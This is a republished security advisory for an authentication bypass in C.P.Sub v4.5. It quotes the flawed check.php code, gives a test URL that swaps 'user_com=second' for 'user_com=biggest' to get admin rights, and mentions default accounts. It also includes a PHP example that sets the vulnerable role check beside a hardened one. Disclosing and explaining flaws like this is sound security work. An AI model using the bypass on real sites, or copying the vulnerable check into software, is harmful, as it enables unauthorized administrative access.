C.P.Sub 4.5 Authentication Bypass

Source: Internet  Author: Anonymous  Date: 2015-10-19 08:33
#!/usr/bin/python
#
# Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Author: Chako
# Developer: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
####################################################################
 
Improper Authentication:
==========================================
 
Summary:
    C.P.Sub <= v4.5 uses the "user_com=" request parameter to decide whether the user has admin privilege.
    An attacker can therefore simply change the value of the "user_com=" parameter to gain admin privilege.
 
 
/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------
 
 
Test:
--------------------------------------------------------------
 
change
http://Example_Target/info.php?cookie=yes&user_com=second
 
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
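
The check in check.php trusts a role value supplied by the client. As an added example (not C.P.Sub's code and not part of the advisory), the PHP below puts that pattern beside a role read only from server-side session state. The function names and the `role` session key are hypothetical; `user_com`, `biggest` and `second` are the names shown in the advisory.

```php
<?php
declare(strict_types=1);

// Role names as they appear in the advisory; everything else is hypothetical.
const ROLE_ADMIN = 'biggest';
const ROLE_USER  = 'second';

// Pattern from check.php: the role is taken straight from the request,
// so whoever builds the URL or form decides their own privilege level.
function role_from_request(array $get, array $post): string
{
    if (($get['user_com'] ?? '') !== '') {
        return (string) $get['user_com'];
    }
    return (string) ($post['user_com'] ?? '');
}

// Hardened pattern: the role is whatever the server stored at login.
// Request parameters are never consulted, and unknown values map to "no role".
function role_from_session(array $session): string
{
    $role = $session['role'] ?? '';
    return in_array($role, [ROLE_ADMIN, ROLE_USER], true) ? $role : '';
}

function is_admin(string $role): bool
{
    return $role === ROLE_ADMIN; // strict comparison, no type juggling
}

// Constructed input: an ordinary user's session plus a tampered query string.
$session = ['role' => ROLE_USER];
$get     = ['cookie' => 'yes', 'user_com' => ROLE_ADMIN];

// Same request, two outcomes: the first check follows the URL, the second ignores it.
var_dump(is_admin(role_from_request($get, [])));
var_dump(is_admin(role_from_session($session)));
```

In a deployment the `$session` array would be `$_SESSION` after `session_start()`, with `role` written only by the login handler once the password has been verified.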
 
 
 
Misconfiguration
==========================================
C.P.Sub <= v4.5 ships with some default accounts that allow an attacker
to access the back-end management page. This could lead to further attacks.

 
